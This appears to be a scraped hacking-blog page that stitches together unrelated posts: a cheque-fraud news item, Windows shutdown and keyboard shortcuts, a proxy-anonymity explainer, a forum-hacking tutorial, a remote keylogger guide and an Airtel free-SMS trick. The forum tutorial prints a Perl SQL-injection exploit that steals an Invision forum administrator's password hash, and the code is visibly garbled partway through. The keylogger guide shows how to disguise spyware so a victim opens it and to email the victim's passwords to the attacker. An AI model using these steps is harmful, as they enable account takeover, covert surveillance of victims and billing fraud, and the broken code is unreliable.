This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Massive ID fraud and cheque scam busted in NYC

A corporate identity theft ring that exploited the identities of local corporations, religious institutions, hospitals and even schools to run a cheque fraud scam has been busted in New York.

Investigators reckon the gang of 18 suspects made millions by impersonating workers from an estimated 350 New York-based organisations. Data purchased from corrupt bank insiders was used to lay the groundwork for the scam, which relied on cashing thousands of counterfeit payroll cheques. The fraudsters also plundered the bank accounts of individual victims, using data obtained from corrupt bank insiders to transfer funds to banks under the control of the gang.



Mules were recruited as payees on the counterfeit cheques, which were forged using scanners, cheque stock, magnetic ink, company logos and specialist software. The scam ran between October 2007 and February 2009. One bank alone lost $1.4m through the scam.
The gang was led by alleged masterminds Jasper Grayson, 25, and James Malloy, 26, according to an indictment unsealed this week. Renece Razor, a former teller at a JP Morgan Chase Bank branch in Manhattan, Ilaura Walker, a former worker at a TD Bank branch in Manhattan, and Keisha Polonio, a former clerk at an HSBC Bank branch in the Bronx, are all charged with stealing the personal data of identity theft victims before supplying the details to other members of the gang.

Police are investigating the possible involvement of other suspected bank workers in the scam as part of the ongoing investigation. ®

source : register

Create One-Click Shutdown and Reboot Shortcuts



his is really very easy one but very effective one. Enjoy it! First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.

But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:

shutdown -r -t 01 -c “Rebooting your PC”

Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message “Rebooting your PC.” The shutdown command includes a variety of switches you can use to customize it.

I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:

shutdown -s -t 03 -c “Bye Bye m8!”

shutdown -r -t 03 -c “I ll be back m8 ;)!”

Switch

What it does

-s

Shuts down the PC.

-l

Logs off the current user.

-t nn

Indicates the duration of delay, in seconds, before performing the action.

-c “messagetext”

Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f

Forces any running applications to shut down.

-r

Reboots the PC

Anonymity of a Proxy Server Explained

How does Proxy Server Works ?
This is the First Question that arises in our mind when we use the Proxy Servers for Surfing the Internet without revealing our Identity to Others. Here all these mindboggling questions are answered with easy to understand examples.
The exchange of information in Internet is made by the “client - server” model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server.
What your browser transmits to a web-server:
  • name and a version of an operating system

  • name and a version of a browser

  • configuration of a browser (display resolution, color depth, java / javascript support, …)

  • IP-address of a client

  • Other information

The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:
  • country where you are from

  • city

  • your provider?s name and e-mail

  • your physical address

Information, transmitted by a client to a server is available (accessible) for a server as environment variables. Every information unit is a value of some variable. If any information unit is not transmitted, then corresponding variable will be empty (its value will be undetermined).
These are some environment variables:
REMOTE_ADDR ? IP address of a client
HTTP_VIA ? if it is not empty, then a proxy is used. Value is an address (or several addresses) of a proxy server, this variable is added by a proxy server itself if you use one.
HTTP_X_FORWARDED_FOR ? if it is not empty, then a proxy is used. Value is a real IP address of a client (your IP), this variable is also added by a proxy server if you use one.
HTTP_ACCEPT_LANGUAGE ? what language is used in browser (what language a page should be displayed in)
HTTP_USER_AGENT ? so called “a user?s agent”. For all browsers this is Mozilla. Furthermore, browser?s name and version (e.g. MSIE 5.5) and an operating system (e.g. Windows 98) is also mentioned here.
HTTP_HOST ? is a web server?s name
This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, …). Their quantity can depend on settings of both a server and a client.

[eminimall]

These are examples of variable values:
REMOTE_ADDR = 194.85.1.1

HTTP_ACCEPT_LANGUAGE = ru

HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

HTTP_HOST = www.webserver.ru

HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)

HTTP_X_FORWARDED_FOR = 194.115.5.5
Anonymity at work in Internet is determined by what environment variables “hide” from a web-server.
If a proxy server is not used, then environment variables look in the following way:
REMOTE_ADDR = your IP

HTTP_VIA = not determined

HTTP_X_FORWARDED_FOR = not determined
According to how environment variables “hided” by proxy servers, there are several types of proxies

Transparent Proxies
They do not hide information about your IP address:
REMOTE_ADDR = proxy IP

HTTP_VIA = proxy IP

HTTP_X_FORWARDED_FOR = your IP
The function of such proxy servers is not the improvement of your anonymity in Internet. Their purpose is information cashing, organization of joint access to Internet of several computers, etc.

Anonymous Proxies
All proxy servers, that hide a client?s IP address in any way are called anonymous proxies
Simple Anonymous Proxies
These proxy servers do not hide a fact that a proxy is used, however they replace your IP with its own:

REMOTE_ADDR = proxy IP

HTTP_VIA = proxy IP

HTTP_X_FORWARDED_FOR = proxy IP
These proxies are the most widespread among other anonymous proxy servers.
Distorting Proxies
As well as simple anonymous proxy servers these proxies do not hide the fact that a proxy server is used. However a client?s IP address (your IP address) is replaced with another (arbitrary, random) IP:
REMOTE_ADDR = proxy IP

HTTP_VIA = proxy IP

HTTP_X_FORWARDED_FOR = random IP address

High Anonymity Proxies
These proxy servers are also called “high anonymity proxy”. In contrast to other types of anonymity proxy servers they hide a fact of using a proxy:
REMOTE_ADDR = proxy IP

HTTP_VIA = not determined

HTTP_X_FORWARDED_FOR = not determined
That means that values of variables are the same as if proxy is not used, with the exception of one very important thing ? proxy IP is used instead of your IP address.

Summary
Depending on purposes there are transparent and anonymity proxies. However, remember, using proxy servers you hide only your IP from a web-server, but other information (about browser configuration) is accessible!

How to Hack into forums

This is what you like to call “Hacking a forum”.

I call it “Cracking into a forum” … Learn what hacking means you, lol…

PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as “hackingsite”.

So you’ve got your target. You know the forum to want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1″. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2″.

Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2″.

Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:

CODE

#!/usr/bin/perl -w

##################################################################

# This one actually works :) Just paste the outputted cookie into

# your request header using livehttpheaders or something and you

# will probably be logged in as that user. No need to decrypt it!

# Exploit coded by “ReMuSOMeGa & Nova” and http://remusomega.com

##################################################################

use LWP::UserAgent;

$ua = new LWP::UserAgent;

$ua->agent(”Mosiac 1.0″ . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = ”;}

if (!$ARGV[3]) {$ARGV[3] = ”;}

my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;

my $user = $ARGV[1]; # userid to jack

my $iver = $ARGV[2]; # version 1 or 2

my $cpre = $ARGV[3]; # cookie prefix

my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])

{

print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n”;

exit;

}

my @charset = (”0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”);

my $outputs = ”;

for( $i=1; $i < j=”0;” current =” $charset[$j];” sql =” (” cookie =” (’Cookie’”> $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);

my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this

# does not appear anywhere in the sources

$pattern = ”;

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )

{

$outputs .= $current;

print “$current\n”;

last;

}

}

if ( length($outputs) < member_id=” . $user . ” pass_hash=”">

What the fuck,Pretty confused, aren’t you? What the fuck are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script.

Installing a Keylogger on a Remote Machine

Note: This article is for educational purpose only and the author won’t be responsible for any kind of damage caused by following the information given in this article.

Now to install a Keylogger on a Remote Computer you have to follow the steps given below:

  1. First of all download Winspy keylogger software from link given below:

    http://www.win-spy.com/

  2. After downloading this software, run the .exe. You will be asked to register yourself where you will be asked to enter a Userid and Password. Remember this password as it will be required in uninstalling the software.

  3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.win-spy-1

  4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.winspy-2

  5. Now, Winspy’s main screen will be displayed as shown in image below:winspy-3

  6. Select Remote at top, then Remote install.

  7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.winspy-4

    User - type in the victim’s name

    File name - Name the file to be sent. Use the name such that victim will love to accept it.

    File icon - Keep it the same

    Picture - select the picture you want to apply to the keylogger.

    Email keylog to - Enter your Email address. Hotmail and Yahoo doesnot accept Keylog Files so enter other email address.

    Thats it. This much is enough. If you want, can change other settings also.

  8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Myspace account password.

So guys, I hope you have got the trick on how to hack any email account passwords from this article. If you have any comment or views about article, feel free to mention it in comments section.

Airtel Hack 2009 for Unlimited Free SMS

Many people search for free Airtel message center number to start sending unlimited messages without paying for them. Well, previously many websites made posts on these free message center numbers, but after the frequent use of the number, Airtel capped or filtered those numbers from further use. But still there are few working message center numbers and here I am going to reveal that with you. Note that Airtel might ban this number anytime, so be fast in using this and send free sms to anyone from your Airtel mobile number.

airtel-free-sms-300x112

How to send unlimited free SMS using free SMS center no hack
  1. Navigate to Messages option on your mobile and click on Settings

  2. Click on Message Center Number and proceed to add a new message center number.

  3. In Message Center Name field, write anything. For an example, “crack to hack”.

  4. In the Message Center Number field, write +919810051905

  5. Choose Preferred Connection Type as Packet Data

  6. Save the message center and activate it from the options.



Now we have configured the message settings to send and receive all message through an another message center number. But since we have selected Packet data as connection type, we have to do some additional settings on our phone.
  1. Go to your phone menu and navigate to Settings >> Phone Settings >> Connection >> Packet Data

  2. In the settings of packet Data, edit the following options

  3. Packet Data Connection >> When available and Access Point >> Airtel Live

  4. Save all settings and you are done.

Note: Here we are using a CDMA message center number to send free messages from Airtel mobile. Since CDMA networks don’t support 91 as the country code, you have to add 0 before every number. This is very important and if you make mistake here, this trick will not work.
Example : Suppose you want to send free messages to 9861098610, now while composing the SMS, type this number as 09861098610 in stead of 919861098610 or +919861098610.
And also, message center number settings option may vary from phone to phone. The above steps are mentioned for Nokia mobile phones. If you want to try sending free SMS from any other handset, use your mobile manual and set the new message center number accordingly.

Windows 7 Cheat Sheet

From Desktop

  1. Windows Key + Tab : Aero [press Tab to cycle between Windows]

  2. Windows Key + E : Windows Explorer is launched.

  3. Windows Key + R : Run Command is launched.

  4. Windows Key + F : Search (which is there in previous Windows versions too)

  5. Windows Key + X : Mobility Center

  6. Windows Key + L : Lock Computer (It is there from the earlier versions as well)

  7. Windows Key + U : Launches Ease of Access

  8. Windows Key + P : Projector

  9. Windows Key + T : Cycle Super Taskbar Items

  10. Windows Key + S : OneNote Screen Clipping Tool [requires OneNote]

  11. Windows Key + M : Minimize All Windows

  12. Windows Key + D : Show/Hide Desktop

  13. Windows Key + Up : Maximize Current Window

  14. Windows Key + Down : Restore Down / Minimize Current Windows

  15. Windows Key + Left : Tile Current Window to the Left

  16. Windows Key + Right : Tile Current Windows to the Right

    [Continue pressing the Left and Right keys to rotate the window as well]

  17. Windows Key + # (# is any number) : Quickly Launch a new instance of the application in the Nth slot on the taskbar. Example Win+1 launches first pinned app, Win+2 launches second, etc.

  18. Windows Key + = : Launches the Magnifier

  19. Windows Key + Plus : Zoom in


  20. Windows Key + Minus : Zooms out

  21. Windows Key + Space : Peek at the desktop

From Windows Explorer

22. Alt + Up : Go up one level

23. Alt + Left/ Right : Back/ Forward

24. Alt + P : Show/hide Preview Pane

Taskbar modifiers

25. Shift + Click on icon : Open a new instance

26. Middle click on icon : Open a new instance

27. Ctrl + Shift + Click on icon : Open a new instance with Admin privileges

28. Shift + Right-click on icon : Show window menu (Restore / Minimize / Move / etc). Note: Normally you can just right-click on the window thumbnail to get this menu.

29. Shift + Right-click on grouped icon : Menu with Restore All / Minimize All / Close All, etc.

30. Ctrl + Click on grouped icon : Cycle between the windows (or tabs) in the group

Though some of them are there in previous versions of Windows, Windows 7 has incorporated many of them and have started many afresh.